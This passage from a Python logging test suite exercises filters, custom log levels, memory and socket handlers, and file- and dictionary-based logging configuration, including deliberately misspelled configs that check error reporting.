('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
def test_get_level_name(self):
"""Test getLevelName returns level constant."""
# NOTE(flaper87): Bug #1517
self.assertEqual(logging.getLevelName('NOTSET'), 0)
self.assertEqual(logging.getLevelName('DEBUG'), 10)
self.assertEqual(logging.getLevelName('INFO'), 20)
self.assertEqual(logging.getLevelName('WARN'), 30)
self.assertEqual(logging.getLevelName('WARNING'), 30)
self.assertEqual(logging.getLevelName('ERROR'), 40)
self.assertEqual(logging.getLevelName('CRITICAL'), 50)
self.assertEqual(logging.getLevelName(0), 'NOTSET')
self.assertEqual(logging.getLevelName(10), 'DEBUG')
self.assertEqual(logging.getLevelName(20), 'INFO')
self.assertEqual(logging.getLevelName(30), 'WARNING')
self.assertEqual(logging.getLevelName(40), 'ERROR')
self.assertEqual(logging.getLevelName(50), 'CRITICAL')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
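# Framing note (added for reference): logging.handlers.SocketHandler sends
# each record as a 4-byte big-endian length prefix followed by a pickle of
# the record's attribute dict, roughly:
#
#     data = pickle.dumps(record_dict, 1)
#     frame = struct.pack(">L", len(data)) + data
#
# which is why handle() above reads exactly 4 bytes, unpacks slen, and then
# keeps recv()ing until slen bytes of pickled payload have arrived.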
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
